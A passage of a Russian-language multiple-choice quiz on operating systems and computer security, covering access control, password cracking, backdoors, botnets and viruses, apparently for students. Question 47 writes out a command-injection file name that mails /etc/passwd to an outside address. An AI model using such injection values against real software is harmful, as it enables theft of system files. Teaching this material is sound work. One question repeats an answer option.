А. Наследование приоритетов

В. Клонирование пользователей

С. Пакетную обработку

D. Делегирование полномочий

 

38. К невыгружаемым относятся такие ресурсы, которые не могут быть …

А. Загружены в память

В.Отобраны у процесса

С.Отобраны у процесса

D. Выгружены из памяти

 

39. Интерфейс прикладного программирования предназначен для использования прикладными программами …

А.Адресного пространства процесса

В.Системных ресурсов компьютера

С.Регистров общего назначения процессора

D. Интерпретатора команд пользователя

 

40. По режиму обработки задач различают операционные системы, обеспечивающие __________________ режим (укажите не менее двух вариантов ответа)

А. Виртуальный

В. Мультипрограммный

С. Многопользовательский

D. Однопрограммный

 

41. Угроза зомби реализуется с помощью … и заставляет компьютер выполнять приказания других лиц.

А. вызова утилит операционной системы

В. диспетчера приложений

С. вредоносных программ

D. подбора пароля

 

42. Недостаток систем шифрования с секретным ключом состоит в том, что …

А. отправитель сообщения не может его расшифровать

В. отправитель и получатель должны иметь общий секретный ключ

С. объем вычислений при дешифровании намного больше, чем при шифровании

D. объем вычислений при шифровании намного больше, чем при дешифровании

 

43. Объектами защиты в компьютерных системах могут быть …

А. устройства отображения информации

В. Помещения

С. сотрудники

D. программы

 

44. Политика принудительного управления доступом (mandatory access control) возлагает полномочия по назначению прав доступа к файлам и другим объектам на...

А. пользователей

В. прикладную программу

С. операционную систему

D. руководителей подразделений

45. Защита зашифрованных паролей в UNIX взламывается путем …

А. шифрования множества потенциальных паролей открытым алгоритмом шифрования и поиска совпадений в файле паролей

В. привлечения инсайдеров в качестве сообщников

С. расшифровки всех паролей после копирования файла паролей

D. вычисления пароля путем свертки идентификатора пользователя

 

46. Лазейки в программах создаются …

А. для облегчения отладки программ или в противоправных целях

В. только для противоправных целей

С. для внедрения в программу постороннего кода

D. только для облегчения отладки программ

 

47. Программа, выполняющая копирование файла путем системного вызова, запрашивает у пользователя имена файла-источника и файла-приемника. Злоумышленник ввел в качестве имен файлов следующие значения: “aaa” и “bbb; mail goofinator@mail.ru </etc/passwd”. Какие действия выполнит система?

А. Скопирует файл aaa в bbb отправит файл bbb адресату goofinator@mail.ru.

В. Отправит файл aaa адресату goofinator@mail.ru.

С. Скопирует текст aaa в файл паролей, относящийся к пользователю с идентификатором goofinator@mail.ru.

D. Скопирует файл aaa в bbb и отправит по электронной почте файл паролей адресату goofinator@mail.ru.

48. Наиболее популярное применение ботнетов (сети зараженных компьютеров) - это …

А. организация сетевых азартных игр

В. распространение пиратского контента

С. рассылка коммерческого спама

D. хищение денег с кредитных карт

 

 

49. Перезаписывающий вирус заражает исполняемую программу путем …

А. записи кода вируса в тело зараженной программы после каждого ее вызова

В. перезаписи содержимого стека программы кодом вируса

С. перезаписи служебных секторов дисков

D. записи вируса на место кода программы

50. Обнаружить зашифрованный вирус можно...

А. с помощью универсальной программы дешифрования

В. по характерному поведению зараженной программы при запуске

С. по сигнатурам кода процедур расшифровки вируса

D. по изменению размера программы

 

 


Понравилась статья? Добавь ее в закладку (CTRL+D) и не забудь поделиться с друзьями:  



double arrow
Сейчас читают про: